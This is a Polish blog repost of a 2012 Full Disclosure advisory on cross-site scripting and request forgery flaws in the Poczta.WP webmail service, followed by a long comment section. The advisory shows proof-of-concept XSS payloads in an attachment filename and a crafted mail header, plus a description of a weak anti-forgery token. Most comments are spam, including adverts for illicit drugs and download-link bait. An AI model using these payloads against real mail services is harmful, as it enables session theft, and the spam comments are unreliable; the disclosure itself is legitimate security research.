czwartek, 6 grudnia 2012

[Full Disclosure] Poczta.WP Multiple vulnerabilities

Orginal: http://seclists.org/fulldisclosure/2012/Dec/68



Poczta.WP Multiple vulnerabilities full disclosure

Author: Jakub Zoczek [zoczus(x)gmail.com]


0x01 Intro



Wirtualna Polska S.A. (WP) is one of the largest Polish web portals.
Their email service (poczta.wp.pl) is affected by multiple cross-site
scripting vulnerabilities and also one, almost fixed cross-site
request forgery bug. After long time of waiting - I got a
non-professional answer from Customer Service Manager of WP, so I
decided to post all my research here. Thus...

0x02 XSS in mail attachments.
Reported: 10/10/2012
State: Fixed

Proof Of Concept:

For example - jpeg picture with filename:

sowa oraz "> inject <img src="boom.jpg" onerror="alert(document.cookie);"> hhh.jpg

..sent as e-mail attachment.

Result:










0x03 XSRF in AntyHack and AntySpam fitler (adding to white list)


Reported: 24/11/2012
State: "Fixed"

Proof Of Concept:

http://q-x.ath.cx/~zoczus/poc/wp/wp-xsrf.txt

Result:

















0x04 XSRF in AntyHack and AntySpam fitler - bypassing 'fix' ;)

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:
Additional info for 0x03 - as I supposed, WP used the token in a white
list form (every once in a while generated md5 of something). The
problem is, that the token value is probably the same for each user.
For different mail accounts, different browsers, different IP
addresses - token is the same...  Bypassing this protection seems to
be quite simple.


















0x05 XSS in mail headers

Reported: 04/12/2012
State: Not fixed

Proof Of Concept:

Return-Path: <zoczus () fbi pl>
Delivered-To: zoczus () wp pl (zoczus)
Received: (wp-smtpd mx.wp.pl 10088 invoked from network); 30 Nov 2012
16:04:58 +0100
Received: from emkei.cz ([46.167.245.118])
(envelope-sender <zoczus () fbi pl>)
by mx.wp.pl (WP-SMTPD) with SMTP
for <zoczus () wp pl>; 30 Nov 2012 16:04:58 +0100
Received: by emkei.cz (Postfix, from userid 33)
id D4119D5807; Fri, 30 Nov 2012 16:04:57 +0100 (CET)
To: zoczus () wp pl
Subject:
From: "zoczus () fbi pl" <zoczus () fbi pl>
Head<img/src="a"/onerror="alert(document.location)">er: dont have spaces
X-Priority: 3 (Normal)
Importance: Normal
Errors-To: zoczus () fbi pl
Reply-To: zoczus () fbi pl
Content-Type: text/plain; charset=utf-8
Message-Id: <20121130150457.D4119D5807 () emkei cz>
Date: Fri, 30 Nov 2012 16:04:57 +0100 (CET)
X-WP-DKIM-Status: no signature (id: n/a)
X-WP-AV: skaner antywirusowy poczty Wirtualnej Polski S. A.
X-WP-SPAM: NO (UW) 0000010 [8Wph]

Dobre!

Result:









0x06 The end. :)









Powyższe błędy zostały poprawione błyskawicznie po publikacji raportu. 











Autor:



o





















Etykiety:
,
,
,
,

















13 komentarzy:








  1. James30 stycznia 2020 09:03
    Global Research Chems 
    Buy dibutylone online. 
    Buy adderall 30mg 2-2 online.
    Buy 2-FDCK online. 
    Buy 3-MEO-PCP online. 
    Buy 3 FPM CRYSTAL online. 
    Buy 4-ACO DMT online. 
    Buy 4-BMC online. 
    Buy Ritalin Online 
    Packaging is safe and shipping is 100% discreet and delivery is very fast. We ship with DHL, FedEx and UPS for now . 
    OdpowiedzUsuń
    Odpowiedzi
    1. Anonimowy19 kwietnia 2022 01:00
      Zoczus Blog: [Full Disclosure] Poczta.Wp Multiple Vulnerabilities >>>>> Download Now

      >>>>> Download Full

      Zoczus Blog: [Full Disclosure] Poczta.Wp Multiple Vulnerabilities >>>>> Download LINK

      >>>>> Download Now

      Zoczus Blog: [Full Disclosure] Poczta.Wp Multiple Vulnerabilities >>>>> Download Full

      >>>>> Download LINK y4 
      Usuń
  2. heroin14 kwietnia 2020 03:19
    buy cartridges online
    buy thc cartridges online
    buy oil cartridges online
    buy puff bar cartridge online
    buy thc vape cartridges online
    Where can i buy puff bar online
    Order puff bar cartrigdes online
    buy cartridges online reddit
    OdpowiedzUsuń
  3. gem1musi1 maja 2020 16:22
    دانلود آهنگ جدید
    دانلود آهنگ جدید
    آهنگ های اوزیر مهدی زاده
    ریمیکس رادیو جوان
    محسن چاوشی
    ریمیکس شاد
    آهنگ تولدت مبارک
    آهنگ تیم پرسپولیس
    رپ خارجی
    هات بت
    Always have a good site like this, let's have fun
    OdpowiedzUsuń
  4. Anonimowy12 sierpnia 2020 03:44

     One's own social set of Fernie's modern trl and simply environments symptoms, Ticket ones avatars!Endurance steer their Fernie products known a good amount of dealing with by way of hundreds of cruising close(Business valuable to scwipe onto your nose there) Is considered to be as being a in your own reach. Don't ignore the Fernie item, The next thunderstorm methods try not to in most cases help Fernie. Hostels, Accommodation, Conditions, Compacted excellent skiing conditions sicknesses, Increase programs, Webcams, Snowboarding problems, Trl experiences, Programs, Cusine, Things, Competitions and as well, all this Fernie 

    tags: Coach Bags On Sale Online, Michael Kors Bags Sale, Coach Outlet Store Online, MK Outlet, Ray Ban Sunglass Hut

    .
    OdpowiedzUsuń
  5. Eman Sherkawy8 października 2021 22:43
    شركة نقل عفش بالظهران
    شركة نقل عفش برابغ
    شركة نقل عفش بالباحه
    شركة نقل عفش بعسير
    شركة نقل عفش بالمجمعة
    شركة نقل عفش بشرورة
    كيفية نقل العفش بينبع
    اسعار نقل عفش بينبع
    OdpowiedzUsuń
  6. periyannan1 marca 2022 00:56
    Nice blog,I understood the topic very clearly,And want to study more like this.

    ibm full form in india |
    ssb ka full form  |
    what is the full form of dp  |
    full form of brics  |
    gnm nursing full form  |
    full form of bce  |
    full form of php  |
    bhim full form  |
    nota full form in india  |
    apec full form  |
    OdpowiedzUsuń
  7. BoilBean10 kwietnia 2022 14:22
    Maybe https://sharkwow.tv/
    OdpowiedzUsuń
  8. Anonimowy19 kwietnia 2022 00:59
    Zoczus Blog: [Full Disclosure] Poczta.Wp Multiple Vulnerabilities >>>>> Download Now

    >>>>> Download Full

    Zoczus Blog: [Full Disclosure] Poczta.Wp Multiple Vulnerabilities >>>>> Download LINK

    >>>>> Download Now

    Zoczus Blog: [Full Disclosure] Poczta.Wp Multiple Vulnerabilities >>>>> Download Full

    >>>>> Download LINK ee 
    OdpowiedzUsuń
  9. KISHORE24 maja 2022 00:32
    Kendriya Vidyalaya (KVS) Model Paper are very important for the Preparation of annual Exams of Primary School for the Students. <a href="https://boardmodelpaper.com/kvs-primary-school-model-paper-for-1st-2nd-3rd-4th-5th-class/”>KVS 3rd Class Question Paper</a> Grade III Students of Kendriya Vidyalaya can easily get their Latest and most valuable Model Papers from this website. The Students only have to Download the KVS Primary School 3rd class,Model Paper 2022 for all the important subjects are available Including the English,Hindi,Sanskrit,Maths,Science,Social Studies,KVS Class 3rd class Question Paper 2022 has announced School Board Central Board of Secondary Education (CBSE) Authority Ministry of Human Resource Development,KVS All Board Classes III Students who are going to sit in Annual Examination 2022 are allowed to Download KVS Primary School Model Paper 2022 Download our web Portal.
    OdpowiedzUsuń
  10. RSM Enterprises9 września 2022 01:40
    Manage the Erection Issues Using Bluemen 25mg
    Buy Sildenafil Citrate
    Bluemen 25mg
    OdpowiedzUsuń
  11. berry45615 listopada 2022 22:27
    The GST rules are tough on every individual and company that supplies goods and services. All have to register under the goods and services tax (GST) where a certain amount is set for business earning or giving a turnover exceeds Rs. 20 lakhs. GST Registration 2023 These apply to all Indian states except the northern-eastern states. Everyone or business in this category must register with GSTN, where the process will take a few days (6 days). The process is available online through the GST website portal.
    OdpowiedzUsuń
  12. herolune13 sierpnia 2023 03:18
    <a href="http://tabanmusic.com/'>dobra muzyka</a>
    OdpowiedzUsuń




























        

      









Subskrybuj:
Komentarze do posta (Atom)